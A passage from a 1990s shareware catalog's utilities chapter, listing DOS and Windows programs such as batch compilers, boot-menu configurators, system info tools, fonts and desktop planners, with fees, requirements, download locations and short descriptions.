baud modem) + Description: + Offers over 250 functions for computer automation from Windows. + Control and add functions to applications, Windows, networks, + and the resources they connect to. "One of the little-known + + Chapter 2, "Utilities" 130 + + + + treasures of the Windows environment." - Barry Simon, Windows + Sources. Lets you create the custom utilities the application + programmers forgot. + + + 2.5.4.1 Batch file compilers + + See also: Computer programming, Languages. + + Product: PowerBatch + Author: CSD, Inc., 404-926-9565 + Version: 2.2 (05-15-94) + Needs: IBM PC, DOS 2.1 or better. 128k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $30.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of fax, CompuServe, mail support; 3-month return policy; + all ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. + Look for: PWRBAT20.ZIP on BBSs; PWRBAT.EXE on CompuServe in + CIS:IBMSYS forum LIBrary 1 (or contact userID 72701,155 for + assistance). + SWREG#: 2335 + PsL#: 11265 + Download size: 255k (about 19 minutes with a 2400 baud modem) + Description: + Provides a replacement language for DOS batch files. If you can + write a DOS batch file you can create your own .EXE + replacement. More flexibility than batch files. Creates stand- + alone .EXE program, no enhancer file to drag along. Total color + control, fast screen writes, inputs from the keyboard, true + defined variables, program flow control, access to system info + (environ variables, disk types, file sizes, etc). Execute any + external non-TSR .EXE, .COM, .BAT or DOS command. Over 80 cmds. + + + 2.5.5 Configuration utilities + + See also: Computer programming, Languages. + + Chapter 2, "Utilities" 131 + + + + Product: BOOT.SYS + Author: Salvisberg Software & Consulting + Version: 2.10 (10-26-94) + Needs: IBM PC, DOS 2.11 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $11.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + 3-month limited return policy. Lifetime free upgrading + allowed. Free CompuServe IntroPak. + Look for: BOOT210.ZIP on BBSs (call 909-681-6221 to download it + at no charge); BOOTSY.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 73237,3556 for assistance); + BOOT210.ZIP on GEnie in IBMPC forum LIBrary 15. + PsL#: 10020 + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Gives you one or more menus out of CONFIG.SYS to select your + configuration while you're booting up. Similar to DOS6 multi- + config - adds a pretty menu; if/then/else, use of variables, + and on-the-fly editing in CONFIG.SYS; reboot from cmd line; + passwords; installation program, automatically upgrades DOS6 + multi-config; more! Does not write to your disk! No resident + driver under DOS6! Up to 20 items per menu, 25 menus. MS/PC-DOS + 2.11 to 6.3, DR DOS 5.0/6.0, Novell DOS 7, supports DOS= cmd, + QEMM7. + + + Product: Bootit + Multi-boot/user defined HD specs. See full description on + page 118. + + Product: Button Manager for Windows + Icon-driven Windows application launcher. See full description + on page 202. + + Chapter 2, "Utilities" 132 + + + + Product: DasBOOT! + Author: WHEEL Games + Version: 3.0 (10-01-94) + Needs: IBM PC, DOS 2.11 or better. EGA monitor; Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $10.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of mail support. + Look for: availability unknown on BBSs; DASBOT.ZIP on CompuServe + in CIS:FSFORUM forum LIBrary 13 (or contact userID 76662,1623 + for assistance). + Download size: 54k (about four minutes with a 2400 baud modem) + Description: + This menu program lets the user select between several sets of + CONFIG.SYS and AUTOEXEC.BAT files. A very handy utility + program to help you get the maximum amount of memory for using + flight simulators or other memory hungry programs and then + allows an easy way to restore your normal day-to-day + configuration. Compatible with Stacker and delayed-write disk + caches. No double boot needed with Stacker, and flushes write- + delayed caches. Up to 200 configs. + + + Product: EZSET + A versatile printer setup utility. See full description on + page 92. + + Product: HiMOVE + Upper memory manager. See full description on page 69. + + Product: More Control + Author: Sloop Software, 719-260-0433 + Version: 2.0 (06-02-93) + Needs: IBM AT (80286), Windows 3.1 or better. 50k RAM; Hard + disk. + Strongly recommended: Mouse. + Registration fee: $12.50 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; + 1-month return policy; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; MCICLB.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 6 (or contact userID 72540,144 + for assistance). + Download size: 185k (about 14 minutes with a 2400 baud modem) + Description: + Lets you access many of those settings that Microsoft did not + see fit to include in the Control Panel. Change the font used + to display icon titles, the color used by hypertext in Windows + help, the vertical spacing between icons plus many others. Also + include CP-AddIn. This utility allows you to add any program + you want to the Control Panel. + + Chapter 2, "Utilities" 133 + + + + Product: Program Group Specialist + Makes adding icons to Pgm Mgr simple. See full description on + page 203. + + Product: SHERLOCK + A dual window ASCII file comparison utility. See full + description on page 58. + + Product: Snooper + Author: Vias and Associates, 415-921-6262 + Version: 3.40 (06-21-95) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $39.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; lifetime return policy; discounts on upgrades. + Lifetime free upgrading allowed. + Look for: SNOOP340.ZIP on BBSs (call 904-335-7289 to download it + at no charge); SNOOPR.ZIP on CompuServe in CIS:PCHW forum + LIBrary 4 (or contact userID 72260,1601 for assistance). + SWREG#: 2535 + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + A powerful yet friendly system info utility. It shows CPU/NDP, + bus (incl. PCI), CPU speed, DOS, BIOS, memory, disks, video, + CD-ROM, env, keyboard, sound cards, ports, IDE model, CMOS + info, disk cache, Stacker, FILES= & BUFFERS=, IRQs, DMA, + modems, fax/modems, mice, port IRQs. Lets you edit CMOS, + CONFIG, & AUTOEXEC. Network info and benchmark screens, detects + 1100 MicroChannel cards. Auto-logging feature. Ideal for tech + support, HW inventory, & you! + + + Product: Super Stuff Utilities + Windows based utilities that enhance Windows. See full + description on page 204. + + Chapter 2, "Utilities" 134 + + + + Product: SuperSet - Environment Extender + Author: Ross Leidy + Version: 1.1 (02-01-95) + Needs: IBM PC, DOS 2.11 or better. + Registration fee: $12.95 + Registration benefits: Full program functionality; 12 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 12-month free upgrading allowed. + Look for: SSET11.ZIP on BBSs; SSET11.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 1 (or contact userID 75122,1275 for + assistance). + SWREG#: 4556 + Download size: 30k (about two minutes with a 2400 baud modem) + Description: + A replacement for the DOS SET command. It lets you: + * Extend environment strings to any arbitrary length. No + more limit of 127 characters for the DOS PATH. + * Modify existing environment strings. + * Save environment snapshot files. Save and Restore your + entire environment in a single command. + * Manipulate Novell Netware drives in the PATH. + * Operate on Parent or Master environment block. + * Display your environment in an easy-to-read format. + + + Product: Win Multiple Configurations + Author: JRE Enterprises + Version: 6.2 (10-05-94) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM; EGA + monitor; Hard disk; VBRUN300.DLL. PKUNZIP v2.04G or later. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $18.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + BBS, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 6); discounts on upgrades. 3-month free + upgrading allowed. + Look for: WMC62.ZIP on BBSs (call 602-814-0483 to download it at + no charge); WMC62.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71162,2311 for assistance). + SWREG#: 662 + Download size: 570k (about 43 minutes with a 2400 baud modem) + Description: + Allows up to 100 different Windows configurations to be saved + and restored. Create and save desktops specific for your + children, husband, wife, work partner, etc., or for any special + purposes you wish. Ability to specify files to be included in + each saved configuration. Ability to copy program manager + groups among saved configurations and ability to compress saved + configurations to save disk space. + + Chapter 2, "Utilities" 135 + + + + 2.5.6 Recovery utilities + + Product: Btr Help! + Btrieve File Utility. Repair, Edit, Browse. See full + description on page 498. + + Product: EDDY (EDit DirectorY) + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 17. + + Product: HDTEST + Thorough Read/Write hard/floppy disk test. See full + description on page 27. + + Product: Integrity Master(tm) + Easy to use anti-virus/data integrity prog. See full + description on page 206. + + 2.5.7 Fonts + + Product: Fonter + Author: OsoSoft, 805-528-1759 + Version: 6.2 (04-15-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Registration fee: $20.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited fax, BBS, + CompuServe, mail support; lifetime return policy; all ASP-wide + offers (see page 6); discounts on upgrades. Lifetime free + upgrading allowed. + Look for: FONTER.ZIP on BBSs (call 805-528-3753 to download it at + no charge); FONTER.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + This award-winning program views and prints TT and ATM fonts in + many ways. See font samples, ANSI charts, keyboard display. + Print lists with samples, type specimens, ANSI charts, keyboard + layouts. View font metric details. Preview and install TrueType + fonts too. Save any character as 72 pt. BMP file. This was the + first font viewer for Windows and is still one of the best. + + Chapter 2, "Utilities" 136 + + + + 2.5.7.1 PostScript fonts + + Product: CJNFonts + Author: Christopher J. Noyes Software, 718-625-2262 + Version: 1.00 (11-19-94) + Needs: IBM AT (80286), Windows 3.1 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor; Dual 720k floppy drives; Hard disk; HP + DeskJet printer; HP LaserJet printer; Epson printer. + Registration fee: $25.00 (add $1.50 for shipping to U.S. + addresses) (add $1.50 for shipping to Canadian addresses) (add + $1.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; all ASP-wide offers (see page 6); + discounts on other products. + Look for: CJNFONT.ZIP on BBSs (call 718-625-0411 to download it + at no charge); CJNFNT.ZIP on CompuServe in CIS:NEWAGE forum + LIBrary 1 (or contact userID 71570,3055 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Truetype and Postscript versions. Fetures several Astrology + fonts and a general commercial symbol font. Contents: + AstGlyph-Astrological Glyphs & Symbols AstPi1--Astrological + Decorative Symbols CJNPI-General symbol font for general use. + + + Product: RRKeyCapsGerman (PST1) + Author: RoadRunner Computing, 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RR-GP2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2730 + Download size: 85k (about seven minutes with a 2400 baud modem) + Description: + Complete 2-D German PC keycaps (RRKeyCapsGerman) and sampler + containing mixture of RRKeyLetters and RRWinSymbols for use in + PC docs. Designed by doc writer. Readable at body text sizes, + mnemonic and easy to use. + + Chapter 2, "Utilities" 137 + + + + Product: RRMacCaps & RRKeySampler (PST1) + Author: RoadRunner Computing, 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RR-MP2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2728 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Complete 2-D Mac keycaps (RRMacCaps) and sampler containing + mixture of RRKeyLetters and RRWinSymbols for use in PC docs. + Designed by doc writer. Readable at body text sizes, mnemonic + and easy to use. + + + 2.5.7.2 TrueType fonts + + Product: CJNFonts + Truetype & Postscript fonts. See full description on page 136. + + Product: ESF's TrueType Collection 1 + Author: Elfring Soft Fonts, 708-377-3520 + Version: 1.1 (08-24-93) + Needs: IBM AT (80286), Windows 3.1 or better. 445k RAM; Hard + disk. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: ESFTT1.ZIP on BBSs; ESFTT1.ZIP on CompuServe in + CIS:DTPFORUM forum LIBrary 9 (or contact userID 72417,3437 for + assistance). + Download size: 445k (about 33 minutes with a 2400 baud modem) + Description: + Ten scalable TrueType fonts for Windows 3.1 and WordPerfect 6.0 + for DOS. Includes a SETUP program to automatically install the + fonts and an illustrated tutorial on fonts. Includes: Aapex, + Century, Century Bold, Cursive Elegant, Friz Quad, Friz Quad + Bold, Old English, MicroStile, MicroStile Bold, & Zap Chance. + + Chapter 2, "Utilities" 138 + + + + Product: RISS Font Pak #1 + Author: Rhode Island Soft Systems, Inc., 401-767-3106 + Version: 1.3 (02-25-94) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $19.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of unlimited phone, fax, BBS, + CompuServe, newsletter, mail support; 3-month return policy; + bonus fonts; all ASP-wide offers (see page 6); discounts on + other products; discounts on upgrades. + Look for: RISSFP1.ZIP on BBSs (call 401-767-3931 to download it + at no charge); RISSF1.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 299k (about 22 minutes with a 2400 baud modem) + Description: + A collection of five decorative, specialty TrueType Fonts for + Windows 3.1. These are highly ornamental, original, exciting + fonts guaranteed to spruce up any document! Great for + headlines, and body text alike. Comes complete with fully + automated installation system - just run SETUP and everything + is done for you - it runs on "autopilot" and couldn't be + easier! Includes comprehensive documentation. + + + Product: RRKeyCaps & RRKeySampler (PST1) + Author: RoadRunner Computing, 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RR-PP2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2726 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Complete 2-D PC keycaps (RRKeyCaps) and sampler containing + mixture of RRKeyLetters and RRWinSymbols for use in PC docs. + Designed by doc writer. Readable at body text sizes, mnemonic + and easy to use. + + Chapter 2, "Utilities" 139 + + + + Product: RRKeyCaps & RRKeySampler (TT) + Author: RoadRunner Computing, 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RR-PT2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2725 + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + Complete 2-D PC keycaps (RRKeyCaps) and sampler containing + mixture of RRKeyLetters and RRWinSymbols for use in PC docs. + Designed by doc writer. Readable at body text sizes, mnemonic + and easy to use. + + + Product: RRKeyCapsGerman (TT) + Author: RoadRunner Computing, 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RR-GT2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2729 + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Complete 2-D German PC keycaps (RRKeyCapsGerman) and sampler + containing mixture of RRKeyLetters and RRWinSymbols for use in + PC docs. Designed by doc writer. Readable at body text sizes, + mnemonic and easy to use. + + Chapter 2, "Utilities" 140 + + + + Product: RRMacCaps & RRKeySampler (TT) + Author: RoadRunner Computing, 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; RR-MT2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2727 + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + Complete 2-D Mac keycaps (RRMacCaps) and sampler containing + mixture of RRKeyLetters and RRWinSymbols for use in PC docs. + Designed by doc writer. Readable at body text sizes, mnemonic + and easy to use. + + + Product: Top Fonts Sampler + Author: Elfring Soft Fonts, 708-377-3520 + Version: 1.3 (08-23-93) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $20.00 + Registration benefits: 3 months of phone support; discounts on + other products. + Look for: availability unknown on BBSs; TOPFNT.ZIP on CompuServe + in CIS:DTP forum LIBrary 9 (or contact userID 72417,3437 for + assistance). + Download size: 268k (about 20 minutes with a 2400 baud modem) + Description: + A collection of 8 scalable TrueType fonts for Windows 3.1. + Includes: Cooper Black, Cursive Elegant, Future Black, Nova, + Nova Bold, Nova Italic, Nova Bold-Italic, & Old English. Easy + to install in Windows and they work on any printer. All fonts + include the full international character set. + + + 2.5.8 Other + + Product: CD-QUICK Cache + Small TSR makes your CD-ROM drive fast! See full description + on page 84. + + Product: CTS Serial Port Utilities + Serial port diagnositic and control utilities. See full + description on page 83. + + Chapter 2, "Utilities" 141 + + + + Product: HandyDOS + Author: Abri Technologies, Inc. + Version: 1.6 (10-22-92) + Needs: IBM PC, DOS 3.3 or better. 100k RAM. + Registration fee: $25.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; + discounts on upgrades; registration commissions. + Look for: availability unknown on BBSs; HDOS.EXE on CompuServe in + CIS:IBMSYS forum LIBrary 3 (or contact userID 72345,1623 for + assistance). + Download size: 20k (about two minutes with a 2400 baud modem) + Description: + Twelve handy, well written DOS utilities for: file handling + (moving-deleting files & directories, WYSIWYG attribute + changing, etc.); batch programming (pop-up windows, cursor + moving, colour/sound); a stay-in-dos menu system; and a + versatile video & cursor checking/setting utility. A good demo + batch included. + + + Product: MEG SYSTEM INFO GRAPHS PIE 3-D + Author: Jim Tolliver, 203-322-0298 + Version: 3.5 (07-30-94) + Needs: IBM AT (80286), DOS 4.0 or better. 1024k RAM; VGA + monitor. + Registration fee: $20.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, CompuServe, mail support; 3-month return + policy; bonus utilities; all ASP-wide offers (see page 6). + Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; MEG.ZIP on CompuServe in + CIS:IBMHW forum LIBrary 2 (or contact userID 74213,163 for + assistance); MEG.ZIP on GEnie in PC forum LIBrary 0. + SWREG#: 2259 + PsL#: 11261 + Download size: 66k (about five minutes with a 2400 baud modem) + Description: + Simplifies your PC space for any disk (floppy, hard, network), + shows space as large easy-to-read pie and 3D graphs. Complete + space information is shown in megabytes. You will see 10 Meg + Free instead of xxx bytes. %Free, free, used and total. CPU + identified (including Pentium) and speed tested to .01 Mhz. + Mouse click to advance to next drive or use autoscan. System + info includes CD-ROM, extended memory, DOS and Windows + versions. Five built in screen savers. + + + Product: SAFEPACK + Disk defragmenter with data safety features. See full + description on page 11. + + Chapter 2, "Utilities" 142 + + + + 2.6 Desktop utilities + + Product: C-Menu/32 + A stunning easy 32-bit VGA menuing system. See full + description on page 184. + + Product: Grafer Line Graphs for Reports + Makes line graphs for reports. See full description on + page 414. + + Product: New Menus for Windows + X-Win/Win4 like shell and desktop enhancement. See full + description on page 189. + + Product: PCDESK + Author: Wells Computing Services, 813-447-0604 + Version: 5.1 (07-02-95) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: EGA monitor; Hard disk; HP LaserJet + printer; Mouse; Epson printer; math coprocessor. + Registration fee: $15.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, mail support; 1-month + limited return policy. + Look for: PCDESK51.ZIP on BBSs. + Download size: 94k (about seven minutes with a 2400 baud modem) + Description: + A highly interactive program that generates monthly calendars + and a weekly planner to which you can add memo notes. Also + generates yearly calendars, and displays an analog clock. + Includes an address book data base and an ASCII text editor. + Comes with on-line instructions. + + + Product: q&dBase for Windows + Database creation and maintenance program. See full + description on page 284. + + Product: SensuVoX I + WAV sets to give your PC a Sensual Voice. See full description + on page 211. + + Product: WinCap+ [***] + Powerful Windows(3.1) screen capture utility. See full + description on page 578. + + Product: Winvelope [***] + Envelope printing utility for Windows. See full description on + page 100. + + Chapter 2, "Utilities" 143 + + + + 2.6.1 Multi-function + + Product: ABcmd + Handy, easy to use, Windows command line. See full description + on page 117. + + Product: AMF Daily Planner & P.I.M. + Author: AMF Shareware Productions + Version: 4.0 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. VBRUN300.DLL. + Registration fee: $21.95 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: WPIM.ZIP on BBSs; WPIM.ZIP on CompuServe in CIS:WINSHA + forum LIBrary 10 (or contact userID 74250,1700 for assistance). + SWREG#: 3409 + PsL#: 11789 + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + This PIM is the easiest by far to use. Calendar and daily + planner/to-do list to the year 9000! Full desktop editor which + allows saves and openings. Phone book and address books store + up to 21,000 entries in a Rolodex look-alike dialog. No + clutter. Easy to use. Full drag & drop interface. Drag & drop + scheduling. Up to 64k data per day. Set up to 1440 alarms per + day. Automated dialing, WinFaxing, Mail Merges, scheduling, + envelope printing, business letter creation, and more! + + + Product: Around The House + Complete personal/home information manager. See full + description on page 167. + + Product: Button Manager for Windows + Icon-driven Windows application launcher. See full description + on page 202. + + Product: CEnvi + Simple C-interpreter to enhance batch files. See full + description on page 472. + + Product: Contact-Lens! + Extremely fast contact manager/PIM. See full description on + page 169. + + Product: Day By Day + Scheduler, diary, task manager with password. See full + description on page 170. + + Chapter 2, "Utilities" 144 + + + + Product: Drag 'n' Drop Utils for Win NT + Author: clySmic Software, 518-438-5548 + Version: 1.42 (09-26-94) + Needs: IBM 80386, Windows NT 3.1 or better. March 1993 beta (or + later) of Windows NT. + Registration fee: $14.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; 2-month return + policy; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; NTUTIL.ZIP on CompuServe + in CIS:WINNT forum LIBrary 0 (or contact userID 76156,164 for + assistance). + Download size: 154k (about twelve minutes with a 2400 baud modem) + Description: + Native Win32/NT utilities: + PaperDrop drag 'n' drop wallpaper changer + EXEType d'n'd EXE info utility to keep track of all the + EXE types you use with NT + GeneralDrop makes any program a d'n'd + Also digital & analog clocks, quick NT exit/reboot, a File + Manager add-on (with toolbar buttons!), SysInfo, & a drag 'n' + drop file recycler. + + + Product: Little Black Book + Autodialer/'rolodex' program. See full description on + page 156. + + Product: Safe Program + Lock files in a software safe - Email secure. See full + description on page 45. + + Product: Silver Wolf Desktop + Author: Silver Wolf Software + Version: 1.0 (12-12-94) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; Mouse. + Strongly recommended: VGA monitor. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 6 + months of CompuServe, mail support; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: SW?10.ZIP on BBSs (multiple files) (call 714-376-9240 + to download it at no charge); SW?10.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 9 (multiple files) (or contact + userID 71441,1637 for assistance). + SWREG#: 4130 + Download size: 422k (about 32 minutes with a 2400 baud modem) + Description: + Brings the true, proven, folder/document look & feel to Windows + 3.1 today! Brings you not only the best features of Macintosh & + Windows95, but many other even more intuituve ways to use your + + Chapter 2, "Utilities" 145 + + + + computer. Gives you long filenames, trashcan(delayed( and + immediate delete, icon and text file/directory views, file + finder, a history list of opened files, Program Manager group + access, zip file access, full drag/drop between apps, file + aliases and more! + + + Product: SmilerShell + Windows cmdline, control center, launcher. See full + description on page 217. + + Product: TMC Calendar & Phone Book + Author: Specific Applications Software, 612-722-9659 + Version: 2.1 (01-17-93) + Needs: IBM PC, DOS 3.3 or better. 256k RAM; CGA monitor. + Strongly recommended: Hard disk; Modem. + Registration fee: $10.00 + Registration benefits: 12 months of CompuServe, mail support. + Look for: availability unknown on BBSs; TMC21A.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 16 (or contact userID 76470,3424 for + assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + Menu driven and extremely easy to use program. Keep notes + about your daily schedule and appointments. Print or export as + ASCII files: calendars, monthly notes, phone & address + directory data and mailing lists. You can even dial phone + numbers right from the directory. While running, helpful + information is displayed along the way and additional + information is accessible just by pressing F1. + + + Product: Visual Calendar Planner + A desktop planner similar to office planner. See full + description on page 176. + + Chapter 2, "Utilities" 146 + + + + Product: WinDatCon + Author: Vogel Scientific Software + Version: 2.0 (04-18-94) + Needs: IBM AT (80286), Windows 3.0 or better. EGA monitor; Hard + disk; VBRUN300.DLL. + Registration fee: $25.00 (add $4.00 for shipping to Canadian + addresses) (add $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of CompuServe, mail support; + 3-month limited return policy; all ASP-wide offers (see + page 6). 6-month free upgrading allowed. + Look for: WDC20.ZIP on BBSs; WDC20.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 14 (or contact userID 71302,3436 for + assistance). + SWREG#: 2492 + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + A Windows data conversion program for acceleration, angle, + area, energy, length, power, pressure, speed, temperature, + time, volume and weight. Has many unique features including + pop-up unit definitions, a leap year option, graphical angle + display, calculation of boiling points at specified pressures, + density calculations, and lists of SI prefixes and over 200 + boiling points and densities. A valuable tool for scientists + and students. + + + Product: WinPost + Reminder notes manager for Windows. See full description on + page 177. + + Product: XFile + Author: Phase 33 Digital, Inc. + Version: 2.00 (03-15-95) + Needs: IBM 80386, Windows 3.1 or better. + Strongly recommended: Hard disk; Mouse. + Registration fee: $18.95 + Registration benefits: 6 months of unlimited CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on other products. 1 free update disk(s) + sent out. May upgrade to Pro version rather than wait for next + release. + Look for: availability unknown on BBSs. + SWREG#: 5242 + PsL#: 11955 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Low profile multifunctional desktop utility for Windows 3.1. + Features include drag-n-drop file/directory deletion, multi- + drive file finder, program launcher, timed program execution, + unlimited alarms, system resource monitor, free memory monitor, + quick Windows exit, and general system information. Optionally + displays date, time, resources, and free memory. + + Chapter 2, "Utilities" 147 + + + + Product: ZiPaper + Wallpaper changer uses PKZip to save space. See full + description on page 55. + + 2.6.2 Calculators + + See also: Spreadsheet applications; Mathematics; Finances, + Financial calculators; Business, Business utilities, Weights & + measurements. + + Product: CALC_JNC + Author: James N. Cox, 215-538-7363 + Version: 9.51 (02-20-93) + Needs: IBM PC, DOS 3.0 or better. 58k RAM. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of unlimited phone, CompuServe, GEnie, + mail support; 2-month return policy; bonus utilities; all ASP- + wide offers (see page 6). 12-month free upgrading allowed. 